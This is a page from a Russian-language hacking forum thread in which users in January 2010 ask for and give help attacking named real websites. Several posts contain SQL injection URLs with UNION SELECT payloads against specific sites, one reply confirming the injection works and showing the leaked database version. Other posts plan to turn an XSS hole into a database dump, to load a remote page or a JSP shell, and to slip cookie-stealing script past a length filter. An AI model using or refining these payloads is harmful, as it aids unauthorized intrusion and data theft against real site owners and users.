ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11151  
Старый 08.01.2010, 16:38
Аватар для jecka3000
jecka3000
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме:
2052341

Репутация: 95
По умолчанию

не выводятся принтабельный столобец, перепробовал все....

Код:
http://lanpolis.ru/private/?act1=cat&s=NDg1MTFANDg5VkgwOGhnczVQSQ==&cid=-5+and+1=2+union+select+1,2,3,4,5--
П.С. Запрос из личного кабинета, паблег акк: admin;admin
П.П.С. можно в личку
 
Ответить с цитированием

  #11152  
Старый 08.01.2010, 19:51
Аватар для RAINUR2
RAINUR2
Познающий
Регистрация: 27.08.2009
Сообщений: 33
Провел на форуме:
62823

Репутация: 0
Отправить сообщение для RAINUR2 с помощью ICQ
По умолчанию

Кто научит Sql injection? Уже и уязвимый скрипт написал ,но ни как не получается. Пожалуйста помогите дураку. юин 3355805
 
Ответить с цитированием

  #11153  
Старый 08.01.2010, 22:37
Аватар для .:[melkiy]:.
.:[melkiy]:.
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740

Репутация: 912
По умолчанию

Цитата:
Сообщение от 547  
скуль инжекция...
ввожу в админке:
login:"
pass:'
выдает вот такую ошибку:

Unclosed quotation mark after the character string '') AND (admin_user.public_in = 1)'.
Incorrect syntax near '') AND (admin_user.public_in = 1)

так же пробовал вариацию типо:

login:%00'
password:something

Incorrect syntax near 'something'. Unclosed quotation mark after the character string ') AND (admin_user.public_in = 1)'.

как в таком случае провести инжекцию?

Как вариант попробуй найти скулю на сайте..
 
Ответить с цитированием

  #11154  
Старый 09.01.2010, 00:42
Аватар для Paul_Eckman
Paul_Eckman
Участник форума
Регистрация: 10.11.2009
Сообщений: 122
Провел на форуме:
1245844

Репутация: 199
По умолчанию

Существуют ли уязвимости на флеш-сайтах? (напр., desstudio.co.cc)
Если да - то как их искать?
 
Ответить с цитированием

  #11155  
Старый 09.01.2010, 01:10
Аватар для ccleverr
ccleverr
Новичок
Регистрация: 25.01.2009
Сообщений: 3
Провел на форуме:
16367

Репутация: 1
По умолчанию

Цитата:
Сообщение от Paul_Eckman  
Существуют ли уязвимости на флеш-сайтах? (напр., desstudio.co.cc)
Если да - то как их искать?

Flash работает на клиенте (на компе, а не на сервере). Если ты хочешь попытаться "забраться" на сервер, то можно:

- декомпилировать Flash или просто снять посылаемые запросы, чтоб посмотреть как коммуникация с сервером идет;

- и потом в зависимости от того, какой клиент (PHP, JSP, ASP) на сервере попытаться найти уязвимость, из-/подменяя параметры/данные передаваемые Flash-Client'ом.
 
Ответить с цитированием

JSP XSS взлом
  #11156  
Старый 09.01.2010, 01:22
Аватар для ccleverr
ccleverr
Новичок
Регистрация: 25.01.2009
Сообщений: 3
Провел на форуме:
16367

Репутация: 1
По умолчанию JSP XSS взлом

У меня такой вопрос, т.к. я в JSP exploiting неочень пока щарю, но учусь...

сайт: JSP (J2EE) (AJAX)
сервер: Apache Tomcat 5.0.28 с Coyote Connector
уязвимость: XSS, поле позволяет максимум 80 символов.

конечная цель: добраться до данных BD (dump)

пром. цель: залить/подключить что-то вроде шелла (есть ли для JSP нормальные?*), или слить оригиналы jsp страниц, чтоб посмотреть как обращение к BD идет.


какой самый оптимальный способ воспользоваться.

мои варианты:

1. Include, так чтоб на сайт ничего не заливать, чтоб следов поменьше было.

Код:
<jsp:include page="{HttpServletRequest().getParameter("xx")}" />
в хх подставил удаленный HTML. Чето не работает ((


Что посоветуете?


Update:

* Нашел неплохой JSP File Browser
http://www.vonloesch.de/jspbrowser.html

Последний раз редактировалось ccleverr; 09.01.2010 в 01:43..
 
Ответить с цитированием

  #11157  
Старый 09.01.2010, 16:00
Аватар для Gidz
Gidz
Познающий
Регистрация: 10.08.2009
Сообщений: 30
Провел на форуме:
282022

Репутация: 4
По умолчанию

народ подскажите плз, как такое может быть
Код:
_ttp://flashg amest udio.com/flash_games/flash_games.php?id=17+GROUP+BY+15/*
Код:
_ttp://flas hgames tudio.com/flash_games/flash_games.php?id=17+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15/*
почему не подходит?
 
Ответить с цитированием

  #11158  
Старый 09.01.2010, 16:20
Аватар для RulleR
RulleR
Reservists Of Antichat - Level 6
Регистрация: 12.06.2008
Сообщений: 157
Провел на форуме:
3217552

Репутация: 1668
Отправить сообщение для RulleR с помощью ICQ Отправить сообщение для RulleR с помощью Yahoo
По умолчанию

Цитата:
Сообщение от Gidz  
народ подскажите плз, как такое может быть
Код:
_ttp://flashg amest udio.com/flash_games/flash_games.php?id=17+GROUP+BY+15/*
Код:
_ttp://flas hgames tudio.com/flash_games/flash_games.php?id=17+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15/*
почему не подходит?
все подходит, выводи в 3 поле..и смотри сорец страницы
Код:
<title>Flash Game Studio : 4.0.27-standard</title>
 
Ответить с цитированием

  #11159  
Старый 09.01.2010, 16:23
Аватар для Gidz
Gidz
Познающий
Регистрация: 10.08.2009
Сообщений: 30
Провел на форуме:
282022

Репутация: 4
По умолчанию

Цитата:
Сообщение от RulleR  
все подходит, выводи в 3 поле..и смотри сорец страницы
Код:
<title>Flash Game Studio : 4.0.27-standard</title>
ага выводит, а я на странице искал, сенкс
 
Ответить с цитированием

  #11160  
Старый 09.01.2010, 18:31
Аватар для Nightmarе
Nightmarе
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме:
5749763

Репутация: 1680


Отправить сообщение для Nightmarе с помощью ICQ
По умолчанию

Очередная проблемма.
Нашёл активную XSS на нужном мне сайте.
Ограничение в 50 символов + не позволяет писать слово script
Алерт то выводится нормально, а вот как на боевой сниффер подогнать, я хз, может как и можно, если да, то подскажите.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ